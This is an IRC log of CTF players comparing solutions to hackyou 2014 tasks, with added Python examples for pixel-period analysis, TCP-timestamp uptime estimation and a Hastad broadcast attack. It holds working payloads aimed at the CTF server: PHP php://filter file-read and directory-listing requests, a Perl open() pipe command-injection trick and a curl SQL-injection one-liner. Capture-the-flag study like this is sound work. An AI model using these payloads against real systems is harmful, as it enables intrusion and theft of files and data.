net100 — PCAP
<rik_> did net100 require any bruteforcing?
<Ymgve> rik_: yes it required bruteforcing but it can be done locally
<rik_> OHH
<rik_> oh blehh
<rik_> i refused to brute it
<rik_> kept thinking i was missing something
<hopeless> net 100 http://www.privatepaste.com/aec6fd41bd
ppc400 — Broken Marquee
<phiber_> NOW TELL ME HOW TO FIND THE GOOD PIXELS
<Ymgve> phiber_: periods
<phiber_> what do you mean periods
<Ymgve> phiber_: looking at one pixel in a marquee, the sequence it will flash in repeats as long as the display shows the same text
<vos> phiber_: if you look at the flashing repeat period of every pixel, you'll get 7 values: 0 is like totally random, 1 is an ever-on/off pixel, 45 is this fake one http://img.vos.uz/mbhi.gif, 223 is this fake one http://img.vos.uz/w1fs.gif, 330 is the flag :)
<vos> (also 116, 140, 195 are just random repeating noise)
<phiber_> damn
<phiber_> I found the 45 interval
<kushou> Ymgve: hmm, didn't use that method for ppc400, given the "hello world 123", I made assumptions on the font, then tried to match columns of blanks (spaces between letters), got the bottom 3 lines, then found the 2 by hand
<kushou> (assuming line 1 and 8 are all blanks)
<phiber_> http://i.imgur.com/Kjq5Dgm.png
<phiber_> DAMN
<vos> phiber_: damn
<phiber_> I totally overlooked the 330 interval
<phiber_> thought it was a zero
<phiber_> fuck
<phiber_> the damn ppc400 https://privatepaste.com/f22b59e446
<spq_> what was the intended way for solving broken marquee
<spq_> ?
<Ymgve> spq_: finding periods was probably the intended way
<Ymgve> also parsing the image was a big part of the task
<spq_> had that done but no luck with my analyzing stuff after that
<Ymgve> but then vos decided we were all a bunch of jerks for not attempting it so he gave us the data
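The per-pixel period analysis that Ymgve and vos describe above, as an added example (editor's code, not code from the chat, the task author or any of the pasted solutions). The frame data is constructed inline rather than parsed from the task's GIF, the 16x8 panel layout is an assumption, and the periods 45, 223 and 330 are just the values vos quotes, used here to make the synthetic capture concrete.

```python
"""Find marquee pixels by the period of their on/off sequence.

Added example for the Broken Marquee discussion; frames are synthetic.
"""
import random

WIDTH, HEIGHT = 16, 8          # assumed panel size for the synthetic capture
N_FRAMES = 990                 # three full repetitions of the longest period
FLAG_PERIOD = 330              # period vos quotes for the real flag pixels
DECOY_PERIODS = (45, 223)      # periods he quotes for the two fake images


def pixel_kind(x, y):
    """Assumed layout of the synthetic panel (not the task's): rows 2..5 of
    columns 0..7 flash with the flag period, columns 8..11 with the decoy
    periods, column 12 is always on, everything else is random noise."""
    if 2 <= y <= 5 and x < 8:
        return ("periodic", FLAG_PERIOD)
    if 2 <= y <= 5 and 8 <= x < 12:
        return ("periodic", DECOY_PERIODS[(x - 8) % 2])
    if x == 12:
        return ("constant", 1)
    return ("noise", 0)


def periodic_stream(period, shift, n):
    """A 0/1 stream whose minimal period is exactly `period`: one two-frame
    pulse per period, rotated by `shift` so neighbouring pixels differ."""
    block = [0] * period
    block[shift % period] = 1
    block[(shift + 1) % period] = 1
    return [block[i % period] for i in range(n)]


def build_capture(seed=1):
    """Returns (frames, expected): frames[t][y][x] is the pixel state in
    frame t; expected is the set of flag-pixel coordinates planted."""
    rng = random.Random(seed)
    streams, expected = {}, set()
    for y in range(HEIGHT):
        for x in range(WIDTH):
            kind, period = pixel_kind(x, y)
            if kind == "periodic":
                streams[(x, y)] = periodic_stream(period, 7 * x + 3 * y, N_FRAMES)
                if period == FLAG_PERIOD:
                    expected.add((x, y))
            elif kind == "constant":
                streams[(x, y)] = [1] * N_FRAMES
            else:
                streams[(x, y)] = [rng.randrange(2) for _ in range(N_FRAMES)]
    frames = [[[streams[(x, y)][t] for x in range(WIDTH)] for y in range(HEIGHT)]
              for t in range(N_FRAMES)]
    return frames, expected


def minimal_period(seq):
    """Smallest p with seq[i] == seq[i+p] for every i, requiring at least two
    full repetitions inside the sample; 0 when nothing repeats (noise)."""
    n = len(seq)
    for p in range(1, n // 2 + 1):
        if all(seq[i] == seq[i + p] for i in range(n - p)):
            return p
    return 0


def period_map(frames):
    """Per-pixel period over a list of frames: {(x, y): period}."""
    height, width = len(frames[0]), len(frames[0][0])
    return {(x, y): minimal_period([f[y][x] for f in frames])
            for y in range(height) for x in range(width)}


def flag_pixels(frames, period=FLAG_PERIOD):
    """Coordinates of every pixel flashing with the flag period."""
    return {xy for xy, p in period_map(frames).items() if p == period}


def period_histogram(frames):
    """How many pixels show each period; on the real capture this is where
    the short list of distinct periods vos mentions comes from."""
    hist = {}
    for p in period_map(frames).values():
        hist[p] = hist.get(p, 0) + 1
    return hist


if __name__ == "__main__":
    frames, expected = build_capture()
    print("periods seen:", period_histogram(frames))
    found = flag_pixels(frames)
    print("flag pixels:", sorted(found))
    assert found == expected
```

Rendering the returned coordinates as a bitmap gives the flag image; the histogram is the first thing to look at on a real capture, since the decoy periods only become obvious once you see that several distinct periods exist.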
net400 — GSMd
<aXs> lol
<aXs> http://codezen.fr/2014/01/15/hackyou-2014-net400-gsmd-sh-write-up/
<vos> my two major fuckups: 1) connecting to port 0 actually worked for HTTPZ; 2) uptime of GSMd could be found from /etc/adjtime
<vos> intended way for GSMd was to use TCP timestamp to estimate uptime
<Ymgve> lol the adjtime wasn't supposed to be there?
<aXs> vos: adjtime is quite off compare to the tcp timestamps
<vos> aXs: but still is a pretty good estimate
<Ymgve> another way: BRUTE FORCE ALL THE TIMESTAMPS
<vos> :D
<vos> Ymgve: hellman solved it that way :)
<vos> he farmed for different hashes for like an hour
<spq_> vos, was there a way to get the uptime without bf?
<vos> spq_: intended way - TCP timestamp field estimation
<Ymgve> spq_: apparently adjtime got roughly the last reboot time and you could get tcp timestamp information
<vos> spq_: shortcut way: look at /etc/adjtime
<Ymgve> stupid way: look at the number of packets sent over lo0
<phiber_> spq_, nmap worked for me, the uptime was accurate with a ~5 minute error
<phiber_> it reported ~73 days uptime
<phiber_> which was within ~15 min of the timestamp in /etc/adjtime
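The "intended way" vos names for GSMd, TCP timestamp uptime estimation, as an added example (editor's code, not from the chat, the task or nmap; it shows the arithmetic an nmap-style uptime guess rests on). The two observations, the boot time and the 250 Hz tick rate are constructed assumptions picked to be consistent with the ~73 day uptime phiber_ reports, not data from the real service.

```python
"""Estimate a peer's uptime and boot time from its TCP timestamp (TSval).

Added example for the GSMd discussion; observations are constructed.
"""

# Tick rates (TSval increments per second) commonly used by TCP stacks;
# assumed list, extend as needed.
COMMON_HZ = (100, 250, 300, 1000)
TSVAL_WRAP = 2 ** 32            # TSval is a 32-bit counter and wraps

# Constructed observations: (capture time as unix seconds, TSval carried in
# the peer's TCP timestamp option), derived from an assumed boot time.
ASSUMED_BOOT = 1376000000
ASSUMED_HZ = 250
_t0 = ASSUMED_BOOT + 73 * 86400
SAMPLES = [
    (_t0,      (_t0 - ASSUMED_BOOT) * ASSUMED_HZ),
    (_t0 + 60, (_t0 + 60 - ASSUMED_BOOT) * ASSUMED_HZ),
]


def raw_rate(samples):
    """Measured ticks per second between first and last sample (one wrap ok)."""
    (t0, v0), (t1, v1) = samples[0], samples[-1]
    return ((v1 - v0) % TSVAL_WRAP) / (t1 - t0)


def snap_rate(raw, tolerance=0.05):
    """Round the measured rate to the nearest common tick rate, else None."""
    for hz in COMMON_HZ:
        if abs(raw - hz) <= hz * tolerance:
            return hz
    return None


def estimate_uptime(samples):
    """Returns (hz, uptime_seconds, boot_time_unix).

    Caveats a practitioner needs: the 32-bit TSval wraps (every ~49.7 days
    at 1000 Hz), so a long uptime is only readable at low tick rates unless
    wraps are counted; and newer Linux kernels randomize the TSval offset
    per connection, which defeats the estimate entirely."""
    hz = snap_rate(raw_rate(samples))
    if hz is None:
        raise ValueError("tick rate does not match any known HZ value")
    t_last, v_last = samples[-1]
    uptime = v_last / hz
    return hz, uptime, t_last - uptime


if __name__ == "__main__":
    hz, up, boot = estimate_uptime(SAMPLES)
    print(f"rate {hz} Hz, uptime {up / 86400:.2f} days, boot at unix {boot:.0f}")
```

Two packets a minute apart are enough to pin the tick rate; the error in the boot time is then dominated by the peer's clock having been reset or adjusted (which is exactly what /etc/adjtime's last-adjustment timestamp, the shortcut vos mentions, records).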
web400 — PHPwning
<Xelenonz> http://blog.rop.sh/hackyou2014-phpwning-web400/ for web400
<cyberguru> Web400 author's exploit - getting RCE http://pastebin.com/xK53uQ7H
<Ymgve> haha lol wtf web400 was supposed to be solved like that?
<Ymgve> I used GlobIterator to browse the file system
<aXs> Ymgve: GET /index.php?action=SplFileObject&param=php%3a//filter/read%3dconvert.base64-encode/resource%3dhttp%3a//localhost/admin.php%3fPHPSESSID%3d../var/www/images/fed2d697dfe09bc58dd785eed9027b06 HTTP/1.1
<Ymgve> http://hackyou2014tasks.ctf.su:40080/index.php?action=GlobIterator&param=/*
<cyberguru> Ymgve: you were lucky, that flag file was first in / directory and you could easily get it using glob:///*
<cyberguru> Ymgve: we need to hide flags deeper :D
<Ymgve> I wonder if it is possible in web400 to exploit the fact that you can spawn a SoapServer with a service description under your control, somehow
<phiber_> I spent hours with soapserver and simplexmlelement
<phiber_> trying to do xxe
<tomcr00se> omg why did the PHPSESSID in the get work?
<tomcr00se> for web400, i was convinced PHP removed that
<cyberguru> tomcr00se: it is custom session handler in "Session" class
<tomcr00se> yea but that doesn't include the id
<tomcr00se> use_only_cookies is 1 by default in PHP > 5.3.0
<spq_> cyberguru: btw. was this intended: http://hackyou2014tasks.ctf.su:40080/index.php?action=GlobIterator&param=/*
<cyberguru> spq_: nope :)
<spq_> just went through the list of classes existing on my local php installation and found that one which looked good :)
<tomcr00se> you got lucky that it printed the flag first
<spq_> otherwise i would have enumerated the dir
<tomcr00se> how?
<spq_> /A* /B* ...
<tomcr00se> i used DirectoryIterator
<tomcr00se> i still don't understand why PHPSESSID works as a get param
<tomcr00se> http://us3.php.net/manual/en/session.configuration.php#ini.session.use-only-cookies
<cyberguru> tomcr00se: but you could read php.ini
<tomcr00se> oh neat, php://filter/read=convert.base64-encode/resource= probably works
<tomcr00se> lol http://192.168.56.2/index.php?action=SplFileObject&param=php://filter/read=convert.base64-encode/resource=/etc/passwd
net300 — HTTPZ
<Ymgve> btw, httpz - why does curl on linux fail with some tls error?
<Ymgve> curl on windows (thru a tunnel) works
<vos> Ymgve: httpz - apache seems not to handle port 0 correctly inside Host header
<vos> intended way for HTTPZ was to patch the stack or write a rewrite rule for iptables :<
<Ymgve> lol
<vos> i thought connect to port 0 won't work :D
<vos> like binding 0 does binding to random
<Ymgve> I did curl on windows -> python tunnel script (since netcat didn't work on port 0 by default) and it magically worked
<aXs> patched netcat then openssl s_client to uses port 0, works fine
<Xelenonz> how did you solve HTTPZ? :D
<Ymgve> Xelenonz: curl from windows through a tcp tunnel into a linux system (that supports port 0)
<phiber_> I used this for httpz http://code.activestate.com/recipes/114642-pinhole/
ppc100 — Trash
<hopeless> so what was the deal with ppc 100
<Ymgve> ppc100 was badly designed
<cyberguru> Ymgve: python "qrcode" module works fine in ppc100
<hopeless> sys.setdefaultencoding("iso-8859-1")
<hopeless> that's needed in pyqrcode
<Ymgve> if anyone else doesn't want to combat their QR tools, here is the proper zip file stitched together https://mega.co.nz/#!oYsUzbaY!PfE1pxCOEj6lT6CHiLc20wCwpFsdKL5E53g0LO7kV9w
<mathiasbynens> and to recursively extract that zip: while ls *.zip >/dev/null 2>&1; do for file in *.zip; do echo "$file"; unzip -q "$file"; rm "$file"; done; done
rev300 — Enchanter
<rik_> how did you guys solve enchanted?
<Ymgve> rik_: it's huffman compression
<rik_> Ymgve, how did you even
<phiber_> after a few hours of tracing and writing pseudocode I recognized it was huffman
<Ymgve> which was much easier than I thought at first, because after a not-too-deep look into the code, I thought it was arithmetic encoding
<Ymgve> and fuck that noise
<rik_> i realized that details was storing the distinct bytes and strength was storing their counts
<rik_> but after that i just gave up
<rik_> because there was too much code O_O
<vos> rik_: personally, i didn't reverse the whole thing. just spotted the frequency table and bit-trash on the output. patched the binary to read freq-table from STDIN and gave it the one from task file. fed it 8x \x00, 8x \x01 and so on and looked what bitstreams it spit out. then when i had all the bit-codes, decoded the original file with a script.
<vos> rik_: my rev300 solution dump http://2014.hackyou.ctf.su/files/reverse300_vos.zip
<spq_> btw. enchanter - that one was fun
<spq_> found the freq. table really fast, after some digging, just produced a file with equal char count and looked at the result
<spq_> one could see the patterns very well, scanned that result and produced a pattern -> char list and used it to decompress the original item.enchanted
<Ymgve> I had quite a few problems because the enchanter and I disagreed on which order equal-weighted nodes should be sorted in
<Ymgve> http://pastebin.com/Rjmfap2g - disenchanter that builds the table itself
ppc300 — Captcha Breaker
<__M__> Was ppc300 supposed to be OCR'd? I noticed there was some public temp directory containing intermediate LaTeX files, one could maybe try to race for those...
<phiber_> uh, I solved it using the latex files
<hopeless> most i talked to used ocr
<hopeless> tesseract to be exact
<pdah> I spent few hours to train tesseract
<__M__> Me too.
<pdah> and same amount of time to wait for the flag
<__M__> Used OCR, but without any training.
<pdah> network was so laggy on that day
<__M__> Tesseract + limited charset + some preprocessing.
<__M__> convert cap.png -background white +repage -bordercolor white -border 50x50 +repage -flatten -fill black -draw "rectangle 30,75 93,168" -flatten -sharpen 1 +matte out.tiff && tesseract out.tiff out config batch.nochop
<cyberguru> __M__: you can write your own captcha solver, because character images are equal every time
<phiber_> ppc300 latex mode https://privatepaste.com/be5f5bc397
<__M__> hopeless: https://privatepaste.com/37291ec123 <- perl/tesseract ppc300
<pdah> I think this is what hopeless asked for: http://hackyou2014tasks.ctf.su:30037/ppc300/tmp/
rev400 — Classic
<phiber_> I solved rev400 with pin and instruction counting
<Ymgve> rev400 was just a simple VM, btw
<Ymgve> also not sure if it was intended but I never could get ida to show the stack when connecting to gdbserver on that task
<phiber_> I used instruction counting to solve it
<phiber_> I didn't even debug it
<Ymgve> phiber_: how what
<phiber_> https://privatepaste.com/789edddc0e
<phiber_> like this
<Ymgve> oh haha
<Ymgve> side channel attack
<phiber_> yeah
<phiber_> easy and fast
net200 — Jailbreaker
<Xelenonz> So, what the solution for Jailbreak?
<vos> Xelenonz: expected was to download an OTA update package. it's not encrypted
<vos> i wonder how those two heroes did it
<vos> did anyone actually jailbreak his atv3g :)
<spq_> ok, last one i didn't solve: jailbreaker - dafuq? i don't have an apple tv :/
<vos> spq_: apple handles their firmware with extreme care, all encrypted and shit
<vos> but it doesn't encrypt the Over-the-Air updates. they are available for download freely
<Ymgve> was that sarcasm
<spq_> so what was the task?
<vos> spq_: just grab an OTA update package from say http://theiphonewiki.com/wiki/OTA_Updates and send me any file
<spq_> downloading a file from somewhere and sending to you via mail?
<spq_> oh ^^
<vos> net200: task is to learn about OTA updates :)
<spq_> i thought i have to provide some kind of code also
<tomcr00se> (also if i had a damn appletv here in berkeley i have a jailbreak that'll work, i had my dad plug in into my linux box at home but i was too lazy to port the jailbreak to linux)
ppc200 — Play with me
<hopeless> surprised more people didnt get play with me
<hopeless> here is my code
<hopeless> http://pastebin.com/Lz778D7V
<Ymgve> well I spent hours wondering why the rules were so obtuse
<Ymgve> then realized that the submit format had the coordinates flipped
<Ymgve> x refers to row not column
web200 — Snake
<LongCatTH> how about snake?
<LongCatTH> I found LFI, but not a flag :/
<Ymgve> the LFI can also be used to run commands
<spq_> flag was in /
<LongCatTH> ahh
<spq_> evil perl :)
<Ymgve> you just have to find a clever way to bypass the "does this file exist" check
<spq_> used `$HTTP_USER_AGENT`| as file :)
<spq_> somehow i was unable to use stuff like | < and > - but i could use dd - so i made a mini shell with pieces from the other .pl files :)
<Ymgve> you could also do something like ../../../../../../bin/ls\0|
<Ymgve> but that didn't really help without the ability to specify parameters
<spq_> mainly perls open() with | at the end
<spq_> http://hackyou2014tasks.ctf.su:20080/cgi-bin/index.pl?ip=../../../../../bin/ls%00|
<LongCatTH> still didn't get snake!
<LongCatTH> should I write a file?
<LongCatTH> space seems not allowed :x
<spq_> LongCatTH: the file must exist, so e.g. "ls /" does not exist in /usr/bin - so you have to find a way around that, e.g. you create a file with the score upload thingy, that makes the index.pl think the file exists but when open'ing, it instead executes part of it (this goes through the shell so backticks are a good example)
<LongCatTH> thx, that's clever 0.0
cry400 — CRYPTONET
<ircc> any writeup for crypto400? what was the idea?
<rik_> hamstad broadcast attack?
<rik_> hastad*
<spq_> crt
<rik_> yeah essentially ^
<spq_> :)
<spq_> + 17th root
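The attack spq_ and rik_ sketch above (Hastad's broadcast attack: CRT across the ciphertexts, then an exact 17th root), as an added example. This is editor's code, not the chat's, the task's or any pasted solution, and it does not know the real CRYPTONET parameters: the 17 toy 128-bit moduli, the seed and the message "broadcast-ok" are constructed here, and e = 17 is taken from the "17th root" remark.

```python
"""Hastad broadcast attack for a small public exponent e.

Added example for the CRYPTONET discussion; keys and message are toys.
"""
import random
from functools import reduce

E = 17                    # public exponent implied by the "17th root" remark
MODULUS_BITS = 128        # assumed toy key size, far too small for real use


def is_probable_prime(n, rounds=20, rng=random.Random(0)):
    """Miller-Rabin; deterministic here because the witness RNG is seeded."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def random_prime(bits, rng):
    while True:
        cand = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(cand):
            return cand


def gen_modulus(bits, rng):
    """n = p*q with gcd(E, (p-1)(q-1)) == 1 so that E is a valid exponent."""
    while True:
        p, q = random_prime(bits // 2, rng), random_prime(bits // 2, rng)
        if p != q and (p - 1) % E and (q - 1) % E:
            return p * q


def crt(residues, moduli):
    """x with x == r_i (mod n_i) for pairwise coprime n_i; returns (x, prod)."""
    N = reduce(lambda a, b: a * b, moduli)
    x = 0
    for r, n in zip(residues, moduli):
        Ni = N // n
        x += r * Ni * pow(Ni, -1, n)        # modular inverse needs Python 3.8+
    return x % N, N


def iroot(x, k):
    """Integer k-th root by Newton iteration; returns (floor root, exact?)."""
    if x < 2:
        return x, True
    r = 1 << ((x.bit_length() + k - 1) // k)   # start at or above the true root
    while True:
        s = ((k - 1) * r + x // pow(r, k - 1)) // k
        if s >= r:
            break
        r = s
    return r, pow(r, k) == x


def hastad(ciphertexts, moduli, e=E):
    """Recover m from e encryptions c_i = m^e mod n_i of the same message.
    Needs at least e ciphertexts, pairwise coprime moduli and m^e < prod(n_i);
    then CRT yields m^e over the integers and the e-th root is exact."""
    x, _ = crt(ciphertexts[:e], moduli[:e])
    m, exact = iroot(x, e)
    if not exact:
        raise ValueError("m^e is not a perfect power: too few ciphertexts, "
                         "shared factors between moduli, or m too large")
    return m


def demo(seed=2014, message=b"broadcast-ok"):
    """Build 17 toy keys, 'broadcast' one message to all, recover it."""
    rng = random.Random(seed)
    moduli = [gen_modulus(MODULUS_BITS, rng) for _ in range(E)]
    m = int.from_bytes(message, "big")
    assert all(m < n for n in moduli)             # plaintext must fit each modulus
    cts = [pow(m, E, n) for n in moduli]          # what the 17 recipients see
    recovered = hastad(cts, moduli)
    return recovered.to_bytes((recovered.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    print(demo())
```

The size condition is the whole attack: with an unpadded 96-bit message, m^17 is about 1632 bits, well below the 2176-bit product of the moduli, so the CRT result is m^17 itself rather than a reduction of it. Proper randomized padding (OAEP) makes each c_i encrypt a different integer and the attack no longer applies.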
web100 — Voting
<LongCatTH> web100 curl -vvv "http://hackyou2014tasks.ctf.su:10080/" -d "vote=1&submit=&id=0x`echo -n '2 and 1=2 union select flag from task.Flag'|xxd -p|tr -d '\n'`"
cry200 — Hashme
<Xelenonz> crypt200 : https://gist.github.com/xelenonz/f9b72131acc3dbf4de8b just has only my trash file
<hopeless> crypto 200 http://pastebin.com/K5Ay2jha
cry300 — Matrix
<phiber_> anyone did crypto300 in python?
<phiber_> I tried but I wasn't getting the right matrix divisions, so in the end I used octave
<rik_> phiber_, https://privatepaste.com/ea8e7640c0
<phiber_> I was using M.inv instead of linalg.inv(), and A*B instead of A.dot(B)
<phiber_> maybe it was because of that
<rik_> ah
<rik_> A*B isn't proper matrix multiplication
<spq_> phiber_: http://paste.ubuntu.com/6758450/ (python crypto300 solution)